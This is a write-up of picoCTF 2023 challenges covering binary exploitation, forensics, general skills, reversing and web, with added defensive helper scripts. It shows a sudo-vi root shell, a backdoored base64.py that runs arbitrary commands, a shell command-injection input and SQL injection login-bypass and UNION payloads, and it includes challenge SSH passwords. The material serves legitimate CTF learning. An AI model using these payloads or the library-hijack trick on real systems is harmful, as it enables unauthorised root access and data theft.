picoCTF 2023 writeup

Binary Exploitation

hijacking

AUTHOR: THEONESTE BYAGUTANGAZA

Description
Getting root access can allow you to read the flag. Luckily there is a 
python file that you might like to play with.
Through Social engineering, we've got the credentials to use on the 
server. SSH is running on the server.

Poking around

The /challenge directory looks suspicious, but we can't cd into it.

Checking the sudo rights shows the user is allowed to run vi with sudo.

exploit

sudo vi

:shell

That is privilege escalation done; from here just go into /challenge/ and grab the flag.

picoCTF{pYth0nn_libraryH!j@CK!n9_5a7b5866}

Original solution

When I first solved this, I tampered with the base64 module that .server.py imports.
I just don't know why, while writing this writeup, I couldn't run .server.py with root privileges.

ls -al reveals a .server.py

cat .server.py

import base64
import os
import socket
ip = 'picoctf.org'
response = os.system("ping -c 1 " + ip)
#saving ping details to a variable
host_info = socket.gethostbyaddr(ip)
#getting IP from a domaine
host_info_to_str = str(host_info[2])
host_info = base64.b64encode(host_info_to_str.encode('ascii'))
print("Hello, this is a part of information gathering",'Host: ', host_info)

vim .server.py can't modify .server.py because it's read-only, but the permissions weren't locked down on base64.py.

Tamper with the imported file:
vim /usr/lib/python3.8/base64.py

import os
while 1:
    cmd=input()
    print(os.popen(cmd).read())

get shell

sudo python3 .server.py
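As an added defensive check (not part of the writeup or the challenge), the script below resolves where a set of imports would load from and flags any module file, or the directory holding it, that group or world can write to. The fixture in demo() is constructed and mirrors the writable base64.py that made .server.py hijackable when run under sudo; in real use call audit_imports with no search_path to audit the running interpreter's sys.path.

```python
import os
import stat
import sys
import tempfile

def _others_can_write(path):
    """True if the group or world write bit is set on path."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def resolve_module(name, search_path):
    """Return the file a plain 'import name' would load, trying each directory
    in order the way Python does for .py modules and packages, or None."""
    for directory in search_path:
        for candidate in (os.path.join(directory, name + ".py"),
                          os.path.join(directory, name, "__init__.py")):
            if os.path.isfile(candidate):
                return candidate
    return None

def audit_imports(module_names, search_path=None):
    """Map each module name to (resolved_file, risky); risky means the module
    file or its directory is writable by group/others, so a low-privilege user
    could replace what a privileged script imports."""
    if search_path is None:
        search_path = [p or os.getcwd() for p in sys.path]  # '' means cwd
    report = {}
    for name in module_names:
        target = resolve_module(name, search_path)
        if target is None:
            report[name] = (None, False)
            continue
        risky = _others_can_write(target) or _others_can_write(os.path.dirname(target))
        report[name] = (target, risky)
    return report

def demo():
    """Constructed fixture: a fake library directory holding a world-writable
    base64.py (the weakness used above) next to a properly protected socket.py."""
    libdir = tempfile.mkdtemp()  # created with mode 0700, so the directory itself is safe
    for fname, mode in (("base64.py", 0o666), ("socket.py", 0o644)):
        path = os.path.join(libdir, fname)
        with open(path, "w") as fh:
            fh.write("# placeholder module body\n")
        os.chmod(path, mode)
    return audit_imports(["base64", "socket", "os"], [libdir])

if __name__ == "__main__":
    for name, (path, risky) in demo().items():
        print(f"{name:8} {'RISKY' if risky else 'ok':5} {path}")
```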

Forensics

hideme

AUTHOR: GEOFFREY NJOGU

Description
Every file gets a flag.
The SOC analyst saw one image been sent back and forth between two
people. They decided to investigate and found out that there was more
than what meets the eye here.

Downloading it gives an image, and it looks perfectly normal.

A look with exiftool shows the flag isn't hidden in any metadata field.

Try strings flag.png

There's something in there that looks like a file path.

Try unzipping flag.png directly, as if it were a zip archive:

unzip flag.png

That yields half of the flag image.

picoCTF{Hiddinng_An_imag3_within_@n_ima9e_92076717}
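The trick works because viewers stop reading at the IEND chunk, so anything appended after it (here a zip) survives untouched. As an added forensic check, not code from the writeup, the parser below walks the PNG chunk list and reports what follows IEND; the sample image and the appended zip header are constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def find_trailing_data(data):
    """Walk the PNG chunk list and return (offset_after_IEND, trailing_bytes).
    Bytes after IEND are ignored by image viewers, which is why an archive
    appended there still looks like an ordinary picture but also unzips."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 12 + length  # 4 length + 4 type + data + 4 crc
        if chunk_end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        if ctype == b"IEND":
            return chunk_end, data[chunk_end:]
        pos = chunk_end
    raise ValueError("no IEND chunk found")

def classify_trailer(trailer):
    """Name common container signatures seen after IEND; 'none' if clean."""
    if not trailer:
        return "none"
    if trailer.startswith(b"PK\x03\x04"):
        return "zip"
    if trailer.startswith(b"\x1f\x8b"):
        return "gzip"
    return "unknown"

def _chunk(ctype, payload):
    """Build one PNG chunk; the CRC covers the type and data fields."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def build_sample(with_zip=True):
    """Constructed 1x1 RGB PNG; with_zip appends a fake zip local-file header
    and a placeholder name, the way the challenge image carries its archive."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\x00\x00\x00")            # filter byte + one RGB pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    if with_zip:
        png += b"PK\x03\x04" + b"\x00" * 26 + b"hidden.txt"
    return png

if __name__ == "__main__":
    offset, trailer = find_trailing_data(build_sample())
    print(f"IEND ends at byte {offset}; trailer: {classify_trailer(trailer)}, {len(trailer)} bytes")
```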

FindAndOpen

AUTHOR: MUBARAK MIKAIL

Description
Someone might have hidden the password in the trace file.
Find the key to unlock this file. This tracefile might be good to analyze.

This challenge gives two files: flag.zip and dump.pcap.
Trying to unzip flag.zip, it asks for a password.

Start with dump.pcap.

Open dump.pcap in Wireshark.

Looking at a few packets at random, they all carry plaintext.

One packet is highly suspicious: the trailing = is very likely base64 padding.

Decoding it gives the first half of the flag:

This is the secret: picoCTF{R34DING_LOKd_

Back to flag.zip: on a hunch, use the first part of the flag as the password.

picoCTF{R34DING_LOKd_fil56_succ3ss_5ed3a878}

??

General Skills

money-ware

AUTHOR: JUNI19

Description
Flag format: picoCTF{Malwarename}
The first letter of the malware name should be capitalized and the rest 
lowercase.
Your friend just got hacked and has been asked to pay some bitcoins to 
1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX. He doesn’t seem to understand what is 
going on and asks you for advice. Can you identify what malware he’s 
being a victim of?

Google 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX

This turns up a CNBC news article.

picoCTF{Petya}

Trivial.

repetitions

AUTHOR: THEONESTE BYAGUTANGAZA

Description
Can you make sense of this file?
Download the file here.

Download enc_flag:

VmpGU1EyRXlUWGxTYmxKVVYwZFNWbGxyV21GV1JteDBUbFpPYWxKdFVsaFpWVlUxWVZaS1ZWWnVh
RmRXZWtab1dWWmtSMk5yTlZWWApiVVpUVm10d1VWZFdVa2RpYlZaWFZtNVdVZ3BpU0VKeldWUkNk
MlZXVlhoWGJYQk9VbFJXU0ZkcVRuTldaM0JZVWpGS2VWWkdaSGRXCk1sWnpWV3hhVm1KRk5XOVVW
VkpEVGxaYVdFMVhSbFZhTTBKWVZGWmFXbVZzV2tkWk0yaFRDbUpXV25sVVZtaFRWMGRHZEdWRlZs
aGkKYlRrelZERldUMkpzUWxWTlJYTkxDZz09Cg==

The trailing == is classic base64.

After decoding:

VjFSQ2EyTXlSblJUV0dSVllrWmFWRmx0TlZOalJtUlhZVVU1YVZKVVZuaFdWekZoWVZkR2NrNVVX
bUZTVmtwUVdWUkdibVZXVm5WUgpiSEJzWVRCd2VWVXhXbXBOUlRWSFdqTnNWZ3BYUjFKeVZGZHdW
MlZzVWxaVmJFNW9UVVJDTlZaWE1XRlVaM0JYVFZaWmVsWkdZM2hTCmJWWnlUVmhTV0dGdGVFVlhi
bTkzVDFWT2JsQlVNRXNLCg==

Decode again:

V1RCa2MyRnRTWGRVYkZaVFltNVNjRmRXYUU5aVJUVnhWVzFhYVdGck5UWmFSVkpQWVRGbmVWVnVR
bHBsYTBweVUxWmpNRTVHWjNsVgpXR1JyVFdwV2VsUlZVbE5oTURCNVZXMWFUZ3BXTVZZelZGY3hS
bVZyTVhSWGFteEVXbm93T1VOblBUMEsK

de

WTBkc2FtSXdUbFZTYm5ScFdWaE9iRTVxVW1aaWFrNTZaRVJPYTFneVVuQlpla0pyU1ZjME5GZ3lV
WGRrTWpWelRVUlNhMDB5VW1aTgpWMVYzVFcxRmVrMXRXamxEWnowOUNnPT0K

deeee

Y0dsamIwTlVSbnRpWVhObE5qUmZiak56ZEROa1gyUnBZekJrSVc0NFgyUXdkMjVzTURSa00yUmZN
V1V3TW1Fek1tWjlDZz09Cg==

eeeeeeee

cGljb0NURntiYXNlNjRfbjNzdDNkX2RpYzBkIW44X2Qwd25sMDRkM2RfMWUwMmEzMmZ9Cg==

aaaaaaaaaa

picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}

picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_1e02a32f}
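Peeling the layers by hand works, but the loop below does the same job automatically and also handles the line-wrapped form enc_flag uses. It is an added example, not code from the writeup; build_sample() constructs a made-up flag wrapped five times in place of the real enc_flag, and the stop condition (output stops looking like base64) is a heuristic.

```python
import base64
import binascii
import re

# Only the base64 alphabet plus up to two '=' pads, once line breaks are removed.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")

def looks_like_base64(blob):
    """Heuristic deciding whether another layer is worth peeling."""
    stripped = b"".join(blob.split())
    return bool(stripped) and len(stripped) % 4 == 0 and B64_RE.match(stripped) is not None

def peel_base64(blob, max_depth=64):
    """Decode base64 repeatedly until the output no longer looks like base64
    (a flag's braces and '!' fail the alphabet test). Wrapped lines such as
    the 76-column output in enc_flag are tolerated. Returns (bytes, layers)."""
    current = blob
    for depth in range(max_depth):
        if not looks_like_base64(current):
            return current, depth
        try:
            current = base64.b64decode(b"".join(current.split()), validate=True)
        except (binascii.Error, ValueError):
            return current, depth
    return current, max_depth

def build_sample(layers=5):
    """Constructed stand-in for enc_flag: a made-up flag wrapped `layers` times
    with base64.encodebytes, which inserts newlines like the original file."""
    data = b"picoCTF{c0nstructed_3xample_fl4g}\n"
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data

if __name__ == "__main__":
    plain, layers = peel_base64(build_sample())
    print(f"peeled {layers} layers -> {plain.decode().strip()}")
```

If a plaintext happens to consist only of base64 characters the loop will keep going, so on real data also stop as soon as the expected flag prefix appears.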

Permissions

AUTHOR: GEOFFREY NJOGU

Description
Can you read files in the root file?
The system admin has provisioned an account for you on the main server:
ssh -p 53849 [email protected]
Password: x+T6aPgE4-
Can you login and read the root file?    

picoCTF{uS1ng_v1m_3dit0r_f6ad392b}

Trivial.

chrono

AUTHOR: MUBARAK MIKAIL

Description
How to automate tasks to run at intervals on linux servers?
Use ssh to connect to this server:
Server: saturn.picoctf.net
Port: 50602
Username: picoplayer 
Password: tPmsUpiHeZ

picoCTF{Sch3DUL7NG_T45K3_L1NUX_0bb95b71}

?

useless

AUTHOR: LOIC SHEMA

Description
There's an interesting script in the user's home directory
Additional details will be available after launching your challenge instance.

picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_6173}

Special

AUTHOR: LT 'SYREAL' JONES

Description
Don't power users get tired of making spelling mistakes in the shell? Not
anymore! Enter Special, the Spell Checked Interface for Affecting Linux.
Now, every word is properly spelled and capitalized... automatically and 
behind-the-scenes! Be the first to test Special in beta, and feel free to
tell us all about how Special streamlines every development process that
you face. When your co-workers see your amazing shell interface, just
tell them: That's Special (TM)
Start your instance to see connection details.
Additional details will be available after launching your challenge
instance.

This challenge keeps turning whatever you type into simple dictionary words and capitalizes the first letter:
ls becomes Is
cat becomes Cat, but a word that isn't first is not capitalized, so the cat command can still be used
after a ; (command injection):

cat;cat *

There's a directory blargh under the current directory:

cat;cat blargh/*

picoCTF{5p311ch3ck_15_7h3_w0r57_f578af59}

Reverse Engineering

Reverse

AUTHOR: MUBARAK MIKAIL

Description
Try reversing this file? Can ya?
I forgot the password to this file. Please find it for me?

The challenge gives a file ret; running it asks for a password.

Throw it into GDB:

start
c
Ctrl-C
ni, over and over

When strcmp is called to compare the password, dump rsi; that gives the first part of the flag:

picoCTF{3lf_r3v3r5ing_succe55ful_9ae8528

Re-run ret and enter that password:

picoCTF{3lf_r3v3r5ing_succe55ful_9ae85289}

Web Exploitation

More SQLi

AUTHOR: MUBARAK MIKAIL

Description
Can you find the flag on this website.
Additional details will be available after launching your challenge instance.

Bypass login

Opening the page shows a classic login form:

username=admin&
password=' or 'a'='a

The challenge helpfully prints the query out for you.

Adjust it a bit:

username=123&
password=' or 1=1;--

After logging in there's a search page.

Test how many columns there are:

searchInput=' union select 1,2,3;--

dump Table

searchInput=' or 'a'='a

No flag in sight; it's probably in another table:

' union select group_concat(sql),2,3 from sqlite_master WHERE type='table';--

Now we know the flag should be in the flag (TEXT) column of more_table:

' union select flag,2,3 from more_table;--

picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_3b0fca37}
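The login page echoes its query, which shows that the password value is pasted straight into the SQL string. As an added example, not the challenge's own code, the snippet below reproduces that construction against a constructed in-memory SQLite table next to the parameterised form that defeats both the login bypass and the UNION trick used on the search box; make_db() and its table schema are assumptions, not the challenge's real schema.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the challenge's login table (not the real schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    con.commit()
    return con

def login_vulnerable(con, username, password):
    """Builds the query by string formatting, as the echoed query on the
    challenge page suggests its login does. Returns (sql, authenticated)."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return sql, con.execute(sql).fetchone() is not None

def login_safe(con, username, password):
    """Parameterised form: the driver binds the values, so a quote inside the
    password is just a character in the comparison, never SQL syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None

def search_safe(con, term):
    """Same fix for a search box: the LIKE pattern is bound, so a UNION in the
    input cannot change the column list or reach other tables."""
    sql = "SELECT username FROM users WHERE username LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + term + "%",))]

if __name__ == "__main__":
    con = make_db()
    payload = "' or 'a'='a"
    sql, ok = login_vulnerable(con, "admin", payload)
    print(sql, "->", ok)                        # the OR makes the WHERE clause always true
    print(login_safe(con, "admin", payload))    # False: no row has that literal password
```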

MatchTheRegex

AUTHOR: SUNDAY JACOB NWANYIM

Description
How about trying to match a regular expression
Additional details will be available after launching your challenge instance.

Without reading the hint, I had no idea what to do at first.

It turns out you just need to match ^p.....F!?

picoCTF{succ3ssfully_matchtheregex_9080e406}

The easiest challenge of the century.

findme

AUTHOR: GEOFFREY NJOGU

Description
Help us test the form by submiting the username as test and password as test!
Additional details will be available after launching your challenge instance.

First log in with test / test!

After logging in it says: I was redirected here by a friend of mine but i couldnt find anything. Help me search for flags :-)

Use Burp Suite to inspect the pages we were redirected through.

The id parameter looks like classic base64.

picoCTF{proxies_all_the_way_be716d8e}